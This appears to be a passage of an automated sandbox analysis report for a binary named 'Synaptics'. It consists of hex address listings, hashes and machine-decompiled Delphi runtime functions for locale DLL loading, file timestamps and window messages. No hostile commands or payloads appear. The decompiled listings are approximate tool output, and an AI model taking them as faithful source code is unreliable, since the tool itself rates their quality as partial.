                                                                                                                                                                                          0x00459fe4
                                                                                                                                                                                          0x00459fe6
                                                                                                                                                                                          0x00459fe9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459fe9
                                                                                                                                                                                          0x00459aef
                                                                                                                                                                                          0x00459af2
                                                                                                                                                                                          0x00459db1
                                                                                                                                                                                          0x00459af8
                                                                                                                                                                                          0x00459fdd
                                                                                                                                                                                          0x00459fde
                                                                                                                                                                                          0x00459fe3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459af2
                                                                                                                                                                                          0x00459ac2
                                                                                                                                                                                          0x00459f1d
                                                                                                                                                                                          0x00459f20
                                                                                                                                                                                          0x00459f24
                                                                                                                                                                                          0x00459f4c
                                                                                                                                                                                          0x00459f26
                                                                                                                                                                                          0x00459f34
                                                                                                                                                                                          0x00459f34
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459f24
                                                                                                                                                                                          0x00459ac8
                                                                                                                                                                                          0x00459ac8
                                                                                                                                                                                          0x00459acd
                                                                                                                                                                                          0x00459ecb
                                                                                                                                                                                          0x00459ed0
                                                                                                                                                                                          0x00459ed2
                                                                                                                                                                                          0x00459ed8
                                                                                                                                                                                          0x00459edd
                                                                                                                                                                                          0x00459ee0
                                                                                                                                                                                          0x00459ee3
                                                                                                                                                                                          0x00459eeb
                                                                                                                                                                                          0x00459ef0
                                                                                                                                                                                          0x00459ef2
                                                                                                                                                                                          0x00459ef9
                                                                                                                                                                                          0x00459ef9
                                                                                                                                                                                          0x00459ef2
                                                                                                                                                                                          0x00459ee3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459ed2
                                                                                                                                                                                          0x00459ad3
                                                                                                                                                                                          0x00459ad6
                                                                                                                                                                                          0x00459f03
                                                                                                                                                                                          0x00459f13
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459adc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459adc
                                                                                                                                                                                          0x00459ad6
                                                                                                                                                                                          0x00459a6c
                                                                                                                                                                                          0x00459dde
                                                                                                                                                                                          0x00459de1
                                                                                                                                                                                          0x00459de3
                                                                                                                                                                                          0x00459de9
                                                                                                                                                                                          0x00459ded
                                                                                                                                                                                          0x00459df2
                                                                                                                                                                                          0x00459df4
                                                                                                                                                                                          0x00459e02
                                                                                                                                                                                          0x00459e07
                                                                                                                                                                                          0x00459e09
                                                                                                                                                                                          0x00459e17
                                                                                                                                                                                          0x00459e1c
                                                                                                                                                                                          0x00459e1e
                                                                                                                                                                                          0x00459e24
                                                                                                                                                                                          0x00459e2b
                                                                                                                                                                                          0x00459e3a
                                                                                                                                                                                          0x00459e53
                                                                                                                                                                                          0x00459e59
                                                                                                                                                                                          0x00459e5e
                                                                                                                                                                                          0x00459e68
                                                                                                                                                                                          0x00459e68
                                                                                                                                                                                          0x00459e1e
                                                                                                                                                                                          0x00459e09
                                                                                                                                                                                          0x00459df4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459de3
                                                                                                                                                                                          0x00459a72
                                                                                                                                                                                          0x00459a77
                                                                                                                                                                                          0x00459aa2
                                                                                                                                                                                          0x00459aa2
                                                                                                                                                                                          0x00459aa7
                                                                                                                                                                                          0x00459e9c
                                                                                                                                                                                          0x00459e9f
                                                                                                                                                                                          0x00459ea7
                                                                                                                                                                                          0x00459eb9
                                                                                                                                                                                          0x00459eb9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459ea7
                                                                                                                                                                                          0x00459aad
                                                                                                                                                                                          0x00459ab0
                                                                                                                                                                                          0x00459dbf
                                                                                                                                                                                          0x00459dc4
                                                                                                                                                                                          0x00459dc6
                                                                                                                                                                                          0x00459dcf
                                                                                                                                                                                          0x00459dcf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459ab6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459ab6
                                                                                                                                                                                          0x00459ab0
                                                                                                                                                                                          0x00459a79
                                                                                                                                                                                          0x00459e74
                                                                                                                                                                                          0x00459e77
                                                                                                                                                                                          0x00459e7f
                                                                                                                                                                                          0x00459e91
                                                                                                                                                                                          0x00459e91
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459e7f
                                                                                                                                                                                          0x00459a7f
                                                                                                                                                                                          0x00459a7f
                                                                                                                                                                                          0x00459a84
                                                                                                                                                                                          0x00459b08
                                                                                                                                                                                          0x00459b08
                                                                                                                                                                                          0x00459b0d
                                                                                                                                                                                          0x00459b1b
                                                                                                                                                                                          0x00459b0f
                                                                                                                                                                                          0x00459b0f
                                                                                                                                                                                          0x00459b14
                                                                                                                                                                                          0x00459b28
                                                                                                                                                                                          0x00459b16
                                                                                                                                                                                          0x00459b33
                                                                                                                                                                                          0x00459b38
                                                                                                                                                                                          0x00459b14
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459b0d
                                                                                                                                                                                          0x00459a89
                                                                                                                                                                                          0x00459a89
                                                                                                                                                                                          0x00459a8c
                                                                                                                                                                                          0x00459cc0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459cc0
                                                                                                                                                                                          0x00459a92
                                                                                                                                                                                          0x00459a97
                                                                                                                                                                                          0x00459fbf
                                                                                                                                                                                          0x00459fc4
                                                                                                                                                                                          0x00459fc6
                                                                                                                                                                                          0x00459fcd
                                                                                                                                                                                          0x00459fcd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459a9d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459a9d
                                                                                                                                                                                          0x00459a97
                                                                                                                                                                                          0x004599b7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004599bd
                                                                                                                                                                                          0x004599c0
                                                                                                                                                                                          0x00459a2c
                                                                                                                                                                                          0x00459a2f
                                                                                                                                                                                          0x00459a4e
                                                                                                                                                                                          0x00459a4e
                                                                                                                                                                                          0x00459a51
                                                                                                                                                                                          0x00459b9e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459b9e
                                                                                                                                                                                          0x00459a57
                                                                                                                                                                                          0x00459a5a
                                                                                                                                                                                          0x00459ce4
                                                                                                                                                                                          0x00459cea
                                                                                                                                                                                          0x00459cf0
                                                                                                                                                                                          0x00459cf6
                                                                                                                                                                                          0x00459cf9
                                                                                                                                                                                          0x00459d00
                                                                                                                                                                                          0x00459d06
                                                                                                                                                                                          0x00459d09
                                                                                                                                                                                          0x00459d10
                                                                                                                                                                                          0x00459d90
                                                                                                                                                                                          0x00459d12
                                                                                                                                                                                          0x00459d21
                                                                                                                                                                                          0x00459d26
                                                                                                                                                                                          0x00459d2c
                                                                                                                                                                                          0x00459d2e
                                                                                                                                                                                          0x00459d78
                                                                                                                                                                                          0x00459d80
                                                                                                                                                                                          0x00459d30
                                                                                                                                                                                          0x00459d35
                                                                                                                                                                                          0x00459d4c
                                                                                                                                                                                          0x00459d4e
                                                                                                                                                                                          0x00459d50
                                                                                                                                                                                          0x00459d52
                                                                                                                                                                                          0x00459d5b
                                                                                                                                                                                          0x00459d69
                                                                                                                                                                                          0x00459d69
                                                                                                                                                                                          0x00459d52
                                                                                                                                                                                          0x00459d2e
                                                                                                                                                                                          0x00459d10
                                                                                                                                                                                          0x00459d00
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459a60
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459a60
                                                                                                                                                                                          0x00459a5a
                                                                                                                                                                                          0x00459a31
                                                                                                                                                                                          0x00459fa7
                                                                                                                                                                                          0x00459fac
                                                                                                                                                                                          0x00459fb2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459fb7
                                                                                                                                                                                          0x00459a37
                                                                                                                                                                                          0x00459a37
                                                                                                                                                                                          0x00459a3a
                                                                                                                                                                                          0x00459f87
                                                                                                                                                                                          0x00459f8e
                                                                                                                                                                                          0x00459f99
                                                                                                                                                                                          0x00459f9f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459fa4
                                                                                                                                                                                          0x00459a40
                                                                                                                                                                                          0x00459a43
                                                                                                                                                                                          0x00459bc8
                                                                                                                                                                                          0x00459bce
                                                                                                                                                                                          0x00459bd1
                                                                                                                                                                                          0x00459bd5
                                                                                                                                                                                          0x00459bdb
                                                                                                                                                                                          0x00459be1
                                                                                                                                                                                          0x00459be4
                                                                                                                                                                                          0x00459be8
                                                                                                                                                                                          0x00459c0f
                                                                                                                                                                                          0x00459c24
                                                                                                                                                                                          0x00459bea
                                                                                                                                                                                          0x00459bed
                                                                                                                                                                                          0x00459c02
                                                                                                                                                                                          0x00459c02
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459a49
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459a49
                                                                                                                                                                                          0x00459a43
                                                                                                                                                                                          0x004599c2
                                                                                                                                                                                          0x00459cc8
                                                                                                                                                                                          0x00459ccb
                                                                                                                                                                                          0x00459ccf
                                                                                                                                                                                          0x00459cd8
                                                                                                                                                                                          0x00459cd8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459ccf
                                                                                                                                                                                          0x004599c8
                                                                                                                                                                                          0x004599cb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004599d1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459fd6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459ba6
                                                                                                                                                                                          0x00459ba8
                                                                                                                                                                                          0x00459baa
                                                                                                                                                                                          0x00459bb2
                                                                                                                                                                                          0x00459bb5
                                                                                                                                                                                          0x00459bb6
                                                                                                                                                                                          0x00459bbc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459c2e
                                                                                                                                                                                          0x00459c31
                                                                                                                                                                                          0x00459c35
                                                                                                                                                                                          0x00459c69
                                                                                                                                                                                          0x00459c6f
                                                                                                                                                                                          0x00459c72
                                                                                                                                                                                          0x00459c79
                                                                                                                                                                                          0x00459c7b
                                                                                                                                                                                          0x00459c7e
                                                                                                                                                                                          0x00459c81
                                                                                                                                                                                          0x00459c86
                                                                                                                                                                                          0x00459c89
                                                                                                                                                                                          0x00459c89
                                                                                                                                                                                          0x00459c92
                                                                                                                                                                                          0x00459c37
                                                                                                                                                                                          0x00459c3a
                                                                                                                                                                                          0x00459c3f
                                                                                                                                                                                          0x00459c42
                                                                                                                                                                                          0x00459c48
                                                                                                                                                                                          0x00459c4a
                                                                                                                                                                                          0x00459c51
                                                                                                                                                                                          0x00459c54
                                                                                                                                                                                          0x00459c54
                                                                                                                                                                                          0x00459c56
                                                                                                                                                                                          0x00459c56
                                                                                                                                                                                          0x00459c5d
                                                                                                                                                                                          0x00459c62
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459b56
                                                                                                                                                                                          0x00459b59
                                                                                                                                                                                          0x00459b5c
                                                                                                                                                                                          0x00459b5d
                                                                                                                                                                                          0x00459b62
                                                                                                                                                                                          0x00459b64
                                                                                                                                                                                          0x00459b73
                                                                                                                                                                                          0x00459b66
                                                                                                                                                                                          0x00459b67
                                                                                                                                                                                          0x00459b6c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459b3e
                                                                                                                                                                                          0x00459b41
                                                                                                                                                                                          0x00459b44
                                                                                                                                                                                          0x00459b46
                                                                                                                                                                                          0x00459b4c
                                                                                                                                                                                          0x00459b4c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00459b7e
                                                                                                                                                                                          0x00459b81
                                                                                                                                                                                          0x00459b88
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045996a
                                                                                                                                                                                          0x0045996a
                                                                                                                                                                                          0x0045996b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045996d
                                                                                                                                                                                          0x00459989
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045998b
                                                                                                                                                                                          0x0045998b
                                                                                                                                                                                          0x0045998d
                                                                                                                                                                                          0x00459990
                                                                                                                                                                                          0x00459990
                                                                                                                                                                                          0x0045a003
                                                                                                                                                                                          0x0045a009
                                                                                                                                                                                          0x00459998
                                                                                                                                                                                          0x00459998
                                                                                                                                                                                          0x00459999
                                                                                                                                                                                          0x00459999
                                                                                                                                                                                          0x0045999a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0045999a

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: RegisterAutomation$vcltest3.dll
                                                                                                                                                                                          • API String ID: 0-2963190186
                                                                                                                                                                                          • Opcode ID: d329678bbdbb713eb9c76e5ad5b00894dd35fa5d4201317eb8747025065c78f8
                                                                                                                                                                                          • Instruction ID: 239074f197e96bcf26dda039fa981a1902ebc25ef421ca5b27d2001906572362
                                                                                                                                                                                          • Opcode Fuzzy Hash: d329678bbdbb713eb9c76e5ad5b00894dd35fa5d4201317eb8747025065c78f8
                                                                                                                                                                                          • Instruction Fuzzy Hash: A4E13C36A04205EFDB40DB69C585A9EB7B5BF04315F2481ABE804DB353C738EE49DB49
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004062DC Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 456 4062dc-40630d lstrcpyn GetThreadLocale GetLocaleInfoA 457 406313-406317 456->457 458 4063f6-4063fd 456->458 459 406323-406339 lstrlen 457->459 460 406319-40631d 457->460 461 40633c-40633f 459->461 460->458 460->459 462 406341-406349 461->462 463 40634b-406353 461->463 462->463 464 40633b 462->464 463->458 465 406359-40635e 463->465 464->461 466 406360-406386 lstrcpyn LoadLibraryExA 465->466 467 406388-40638a 465->467 466->467 467->458 468 40638c-406390 467->468 468->458 469 406392-4063c2 lstrcpyn LoadLibraryExA 468->469 469->458 470 4063c4-4063f4 lstrcpyn LoadLibraryExA 469->470 470->458
                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                          			E004062DC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L0040131C();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401324();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L0040131C();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L0040131C();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L0040131C();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                                                                                                                                                                                          0x004062dc
                                                                                                                                                                                          0x004062e4
                                                                                                                                                                                          0x004062eb
                                                                                                                                                                                          0x004062ec
                                                                                                                                                                                          0x004062ff
                                                                                                                                                                                          0x00406304
                                                                                                                                                                                          0x0040630d
                                                                                                                                                                                          0x004063f6
                                                                                                                                                                                          0x004063fd
                                                                                                                                                                                          0x00406323
                                                                                                                                                                                          0x00406323
                                                                                                                                                                                          0x00406329
                                                                                                                                                                                          0x0040632a
                                                                                                                                                                                          0x00406337
                                                                                                                                                                                          0x0040633c
                                                                                                                                                                                          0x0040633f
                                                                                                                                                                                          0x0040633b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040633b
                                                                                                                                                                                          0x0040634b
                                                                                                                                                                                          0x00406353
                                                                                                                                                                                          0x00406359
                                                                                                                                                                                          0x0040635e
                                                                                                                                                                                          0x0040636b
                                                                                                                                                                                          0x0040636f
                                                                                                                                                                                          0x00406370
                                                                                                                                                                                          0x00406371
                                                                                                                                                                                          0x00406386
                                                                                                                                                                                          0x00406386
                                                                                                                                                                                          0x0040638a
                                                                                                                                                                                          0x004063a3
                                                                                                                                                                                          0x004063a7
                                                                                                                                                                                          0x004063a8
                                                                                                                                                                                          0x004063a9
                                                                                                                                                                                          0x004063b9
                                                                                                                                                                                          0x004063be
                                                                                                                                                                                          0x004063c2
                                                                                                                                                                                          0x004063c4
                                                                                                                                                                                          0x004063d9
                                                                                                                                                                                          0x004063dd
                                                                                                                                                                                          0x004063de
                                                                                                                                                                                          0x004063df
                                                                                                                                                                                          0x004063ef
                                                                                                                                                                                          0x004063f4
                                                                                                                                                                                          0x004063f4
                                                                                                                                                                                          0x004063c2
                                                                                                                                                                                          0x0040638a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406353

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004062EC
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004062F9
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004062FF
                                                                                                                                                                                          • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040632A
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406371
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406381
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 004063A9
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004063B9
                                                                                                                                                                                          • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 004063DF
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 004063EF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                          • API String ID: 1599918012-2375825460
                                                                                                                                                                                          • Opcode ID: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                                                                                                                                                          • Instruction ID: b1d3fb610801afc069037103d2f87a16e6e0ad9f86a4084b42d9068a75e18736
                                                                                                                                                                                          • Opcode Fuzzy Hash: ad1adbca5f22a3984e9f6b7bbf1ccb56e9755cc0a9101fe12dfbbefd2265db37
                                                                                                                                                                                          • Instruction Fuzzy Hash: 20319171E0025C6AFB26D6B89C46BDF7BAC8B44344F4501F7AA05F61C2E6788E848B94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004099E0 Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004099E0(void* __eax) {
				short _v6;
				short _v8;
				struct _FILETIME _v16;
				struct _WIN32_FIND_DATAA _v336;
				void* _t16;

				_t16 = FindFirstFileA(E00404E80(__eax),  &_v336); // executed
				if(_t16 == 0xffffffff) {
					L3:
					_v8 = 0xffffffff;
				} else {
					FindClose(_t16);
					if((_v336.dwFileAttributes & 0x00000010) != 0) {
						goto L3;
					} else {
						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
							goto L3;
						}
					}
				}
				return _v8;
			}








                                                                                                                                                                                          0x004099fb
                                                                                                                                                                                          0x00409a03
                                                                                                                                                                                          0x00409a39
                                                                                                                                                                                          0x00409a39
                                                                                                                                                                                          0x00409a05
                                                                                                                                                                                          0x00409a06
                                                                                                                                                                                          0x00409a12
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00409a14
                                                                                                                                                                                          0x00409a1f
                                                                                                                                                                                          0x00409a37
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00409a37
                                                                                                                                                                                          0x00409a12
                                                                                                                                                                                          0x00409a47

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,?,?,00409A52,00000000,00476780,?,00476888,00000000,0047684D,?,00000000,00476872,?,00000000), ref: 004099FB
                                                                                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,?,?,00409A52,00000000,00476780,?,00476888,00000000,0047684D,?,00000000,00476872), ref: 00409A06
                                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,00409A52,00000000,00476780,?,00476888,00000000,0047684D,?,00000000), ref: 00409A1F
                                                                                                                                                                                          • FileTimeToDosDateTime.KERNEL32 ref: 00409A30
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2659516521-0
                                                                                                                                                                                          • Opcode ID: 7528b25781815408678df836e87887aae96722589871681e5abc56f0fce541ab
                                                                                                                                                                                          • Instruction ID: bf488b194f2b476f169b407b0835a29ee4c7e870b59a6eb425f81542ff1916d2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7528b25781815408678df836e87887aae96722589871681e5abc56f0fce541ab
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF01871D0024CA6CB11DAE58C85ACFB3AC5F04324F1047B7B519F21D2EA389F049B95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043F118 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                          			E0043F118(void* __eax, intOrPtr* __edx) {
				char _v20;
				char _v28;
				intOrPtr _t17;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t32;
				void* _t39;
				void* _t45;
				intOrPtr _t47;
				intOrPtr _t48;
				void* _t50;
				void* _t51;
				intOrPtr* _t65;
				intOrPtr* _t67;
				void* _t68;

				_t67 = __edx;
				_t50 = __eax;
				_t17 =  *__edx;
				_t68 = _t17 - 0x84;
				if(_t68 > 0) {
					_t19 = _t17 + 0xffffff00 - 9;
					if(_t19 < 0) {
						_t21 = E0043B6EC(__eax);
						if(_t21 != 0) {
							L28:
							return _t21;
						}
						L27:
						_t23 = E0043C1FC(_t50, _t67); // executed
						return _t23;
					}
					if(_t19 + 0xffffff09 - 0xb < 0) {
						_t21 = E0043F084(__eax, _t51, __edx);
						if(_t21 == 0) {
							goto L27;
						}
						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
							goto L28;
						}
						_t21 = E00441A08(_t50);
						if(_t21 == 0) {
							goto L28;
						}
						_push( *((intOrPtr*)(_t67 + 8)));
						_push( *((intOrPtr*)(_t67 + 4)));
						_push( *_t67);
						_t32 = E00441704(_t50);
						_push(_t32);
						L00407540();
						return _t32;
					}
					goto L27;
				}
				if(_t68 == 0) {
					_t21 = E0043C1FC(__eax, __edx);
					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
						goto L28;
					}
					E00407A50( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
					E0043AAC0(_t50,  &_v28,  &_v20);
					_t21 = E0043EFF0(_t50, 0,  &_v28, 0);
					if(_t21 == 0) {
						goto L28;
					}
					 *((intOrPtr*)(_t67 + 0xc)) = 1;
					return _t21;
				}
				_t39 = _t17 - 7;
				if(_t39 == 0) {
					_t65 = E004519E0(__eax);
					if(_t65 == 0) {
						goto L27;
					}
					_t21 =  *((intOrPtr*)( *_t65 + 0xe8))();
					if(_t21 == 0) {
						goto L28;
					}
					goto L27;
				}
				_t21 = _t39 - 1;
				if(_t21 == 0) {
					if(( *(__eax + 0x54) & 0x00000020) != 0) {
						goto L28;
					}
				} else {
					if(_t21 == 0x17) {
						_t45 = E00441704(__eax);
						if(_t45 == GetCapture() &&  *0x49bce0 != 0) {
							_t47 =  *0x49bce0; // 0x0
							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
								_t48 =  *0x49bce0; // 0x0
								E0043C130(_t48, 0, 0x1f, 0);
							}
						}
					}
				}
			}



















                                                                                                                                                                                          0x0043f11e
                                                                                                                                                                                          0x0043f120
                                                                                                                                                                                          0x0043f122
                                                                                                                                                                                          0x0043f124
                                                                                                                                                                                          0x0043f129
                                                                                                                                                                                          0x0043f148
                                                                                                                                                                                          0x0043f14b
                                                                                                                                                                                          0x0043f228
                                                                                                                                                                                          0x0043f22f
                                                                                                                                                                                          0x0043f27a
                                                                                                                                                                                          0x0043f27a
                                                                                                                                                                                          0x0043f27a
                                                                                                                                                                                          0x0043f26b
